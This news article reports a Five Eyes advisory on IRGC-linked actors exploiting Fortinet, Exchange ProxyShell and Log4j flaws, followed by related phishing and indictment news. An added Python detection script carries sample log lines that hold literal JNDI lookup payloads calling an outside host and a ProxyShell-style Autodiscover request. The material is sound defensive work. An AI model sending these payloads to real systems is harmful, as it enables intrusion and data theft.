The Australian Cyber Security Centre (ACSC) has joined forces with other Five Eyes nations to issue a joint advisory regarding ongoing Iranian state-sponsored cyber threats. Issued on September 15, the advisory warns that malicious cyber activity by advanced persistent threat (APT) actors connected with Iran’s Islamic Revolutionary Guard Corps (IRGC) is on the rise.
“The IRGC-affiliated actors are actively targeting a broad range of targeted entities, including entities across multiple US critical infrastructure sectors as well as the United Kingdom, Australian and Canadian organizations,” the advisory reads. “The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.”
Those known vulnerabilities include previously publicised flaws in Fortinet appliances and Microsoft Exchange Server. In addition, the authoring agencies report that Iranian-affiliated APT actors are actively exploiting Log4j vulnerabilities in VMware Horizon for initial access, and likely also Log4j2 vulnerabilities in SysAid applications.
“Based on the latest intelligence across the Five Eyes, this advisory again underscores that organisations of all sizes continue to be targeted by capable and increasingly sophisticated adversaries,” said ACSC Head Abigail Bradshaw.
The Five Eyes nations previously issued an alert regarding Iranian government-sponsored APT cyber actors in November 2021. Since then, the intrusion activity has continued. The latest advisory notes that the actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran.
Fortinet FortiOS and Microsoft Exchange Server vulnerabilities remain a favoured route to initial access; in Australia, the ACSC says the actors have exploited CVE-2021-34473, one of the Exchange flaws known collectively as ProxyShell. That access is then leveraged for further malicious activity, including deploying tools to support ransom and extortion operations and to exfiltrate data.
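The advisory's detection guidance centres on the two initial-access routes named above: ProxyShell-style requests against Exchange and Log4Shell-style JNDI lookup strings against Log4j-backed products such as VMware Horizon and SysAid. The following Python script is an added example, not code from the advisory or any of the authoring agencies. It scans constructed IIS-style web-server log lines for those two well-known request patterns (the `/autodiscover/autodiscover.json` path confusion with an `@` and a backend path such as `/powershell`, and a `${jndi:` lookup after URL-decoding and collapsing common `${lower:...}`/`${::-...}` obfuscation). The sample lines, IP addresses and hostnames are fabricated; the log layout is a simplified W3C format assumed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in a simplified IIS W3C layout
# (date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status [cs(User-Agent)]).
# These are fabricated for this example and are not taken from the advisory.
SAMPLE_LOGS = [
    # ProxyShell-style path confusion: Autodiscover stem, '@' in the query, backend PowerShell path
    "2022-09-10 03:12:44 10.0.0.5 GET /autodiscover/autodiscover.json a=b@evil.example/powershell - 443 - 203.0.113.7 200",
    # Plain Log4Shell-style JNDI lookup in the User-Agent field of a VMware Horizon request
    "2022-09-10 03:13:01 10.0.0.9 GET /portal/webclient/index.html - 443 - 203.0.113.7 200 ${jndi:ldap://203.0.113.7:1389/a}",
    # Obfuscated variant using a nested ${lower:} lookup to hide the 'jndi' token
    "2022-09-10 03:13:05 10.0.0.9 GET /portal/ - 443 - 203.0.113.7 200 ${${lower:j}ndi:rmi://203.0.113.7/x}",
    # URL-encoded variant, as it often appears in a raw access log
    "2022-09-10 03:13:09 10.0.0.9 GET /portal/ - 443 - 203.0.113.7 200 %24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fy%7D",
    # Benign traffic: an '@' in the username field alone must not trigger
    "2022-09-10 03:14:00 10.0.0.5 GET /owa/ - 443 user@corp.example 198.51.100.4 200",
]

# Exchange backend paths that a ProxyShell-style request tries to reach via Autodiscover.
BACKEND_PATHS = ("/powershell", "/mapi/", "/ews/", "/ecp/")

# Common Log4j lookup obfuscations, collapsed to the literal they resolve to.
_OBFUSCATION = [
    (re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE), r"\1"),  # ${lower:j} -> j
    (re.compile(r"\$\{::-([^}]*)\}"), r"\1"),                              # ${::-j}   -> j
]


def normalize(text: str) -> str:
    """URL-decode repeatedly and strip lookup obfuscation until the text stops changing."""
    prev, cur = None, text
    for _ in range(5):  # bounded so pathological input cannot loop forever
        if cur == prev:
            break
        prev = cur
        cur = unquote(cur)
        for pattern, repl in _OBFUSCATION:
            cur = pattern.sub(repl, cur)
    return cur


def classify(line: str) -> list[str]:
    """Return the list of indicator tags matched by one log line (empty if none)."""
    tags = []
    norm = normalize(line).lower()

    # ProxyShell: only inspect the request from the Autodiscover stem onwards, so an
    # '@' in an unrelated field (e.g. the username) does not count.
    idx = norm.find("/autodiscover/autodiscover.json")
    if idx != -1:
        tail = norm[idx:]
        if "@" in tail and any(backend in tail for backend in BACKEND_PATHS):
            tags.append("proxyshell-path-confusion")

    # Log4Shell: after normalisation any remaining '${jndi:' is a lookup attempt.
    if "${jndi:" in norm:
        tags.append("log4shell-jndi")
    return tags


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Scan a log and return (line_index, tags) for every line that matched."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for index, tags in scan(SAMPLE_LOGS):
        print(f"line {index}: {', '.join(tags)}")
```

Run against live logs, the same two checks would be fed from the Exchange front-end IIS logs and the Horizon or SysAid web tier; a hit on either pattern warrants checking whether the request returned a success status and whether new webshells, scheduled tasks or outbound connections followed it, since the advisory describes this access as the first step before tooling for extortion and data theft is deployed.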
“After gaining access to a network, the IRGC-affiliated APT actors likely determine a course of action based on their perceived value of the data,” the advisory says. “The actors may sell the data or use the exfiltrated data in extortion operations or double extortion ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.”
In the same week the Five Eyes joint advisory was issued, reports out of the US say Iranian-affiliated APT actors are targeting individuals with known interests in Middle Eastern affairs, nuclear security, and genome research.
Cybersecurity firm Proofpoint says an IRGC-sponsored phishing email campaign is now underway, using sock-puppet accounts to impersonate genuine individuals at institutions such as the Pew Research Center, the Foreign Policy Research Institute, and Chatham House.
On September 14, the US Department of Justice (DOJ) indicted three Iranians alleged to have conducted cyber-attacks against critical infrastructure located in the US and elsewhere. The DOJ alleges the individuals targeted a broad range of organizations, including small businesses, government agencies, non-profit programs and educational and religious institutions.
“The Government of Iran has created a safe haven where cyber criminals acting for personal gain flourish and defendants like these can hack and extort victims, including critical infrastructure providers,” said Assistant Attorney General Matthew G. Olsen of the DOJ’s National Security Division. “This indictment makes clear that even other Iranians are less safe because their own government fails to follow international norms and stop Iranian cyber criminals.”
Thursday’s joint advisory offers a range of detection and mitigation advice and says targeted entities should report cybersecurity incidents to the ACSC and continue to monitor its alerts and advisories.